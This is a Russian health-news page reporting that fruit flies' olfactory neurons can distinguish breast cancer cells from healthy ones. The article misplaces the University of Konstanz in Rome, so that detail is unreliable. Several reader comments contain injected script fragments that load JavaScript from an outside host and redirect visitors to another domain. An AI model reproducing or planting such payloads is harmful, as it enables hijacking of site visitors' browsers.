Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  На что слетаются мухи? Ок...  >>  На что слетаются мухи? Оказывается, на рак!
 
Обратная связь
 

На что слетаются мухи? Оказывается, на рак!

Размер шрифта
16 октября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Невероятно, но факт: обоняние насекомых – настолько тонкий инструмент, что в своей точности превосходит даже сложные медицинские приборы. Совсем недавно Джованни Галиция, профессор нейробиологии и зоологии, доказал, что фруктовые мухи способны отличать опухолевые клетки от здоровых с помощью обоняния.

На что слетаются мухи? Оказывается, на рак!

В статье, опубликованной в международном журнале Scientific Report, ученые из Университета Констанц в Риме, Италия, описали, как можно зафиксировать сигналы от обонятельных рецепторов мухи дрозофилы. Сами рецепторы активируются в присутствии запаха. Оказалось, что мухи могут не только отличить здоровые клетки от раковых, но и определить различия между клетками отдельных типов опухолей.

«Что действительно поражает – так это то, что живое существо обладает невероятно высокой чувствительностью, которой лишены даже «электронные носы» или научные методы вроде газовой хроматографии», – рассказывает Джованни Галиция. Природные обонятельные системы могут очень точно определять малейшие различия в запахе между здоровыми и опухолевыми клетками. Это уже было показано в экспериментах на собаках, однако данных было все еще недостаточно для применения метода в медицинских целях.

Молекулы запаха, соединяясь с нейронами-рецепторами на усиках мухи, приводят к активации этих нейронов. Ученым удалось разработать специальную методику, благодаря которой можно обнаружить активные нейроны, сочетания которых различны при воздействии разных ароматов. Активные нейроны светятся под микроскопом благодаря генетическим модификациям. В эксперименте проводилось сравнение пяти разных типов клеток рака груди, а также здоровых клеток; во всех случаях была зафиксирована различная активность нейронов.

«В нашей работе мы смогли не только различить здоровые и опухолевые клетки. Даже отдельные типы рака груди могут быть распознаны при помощи обонятельного аппарата на усиках мухи дрозофилы», – объясняет Алия Людке, член исследовательской группы.

Эти результаты могут стать основой для проведения дальнейших исследований в области диагностики рака: «Высокая чувствительность обонятельных рецепторов, а также скорость, с которой мы можем проводить такие тесты, позволит создать дешевый, быстрый и очень эффективный метод диагностики. Он поможет выявить опухолевые клетки еще до того, как врачи смогут обнаружить их стандартными методами», – добавляет Джованни Галиция.

Как оказалось, природа сама иногда подсказывает нам решения сложных научных проблем, над которыми десятилетиями работают лучшие ученые мира.

Другие интереснейшие статьи о раковых заболеваниях вы легко найдете на страницах нашего специального проекта «Онко-дозор».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Arturiya

20 октября 2014 в 23:56

Цитировать   |   Пожаловаться

Кажется это не то чего я ожидал

2 - Arturiya

20 октября 2014 в 23:56

Цитировать   |   Пожаловаться

Кажется это не то чего я ожидал

3 - zzzzzz

30 июня 2015 в 18:31

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 21:32

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 22:27

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Сельдерей и артишок убивают раковые клетки! Сколько надо съесть   Какой напиток не позволит вам ослепнуть?!   Узнайте, будет ли у вас рак в течение 10 лет   Стоит ли есть мясо? Хотите ли вы получить рак или нет?  
23 июля 2013Из лысых крыс сделают лекарство от рака 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Что можно и чего нельзя с изжогой?
Бронхит: лицом к лицу
Еда против рака. Часть 2

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.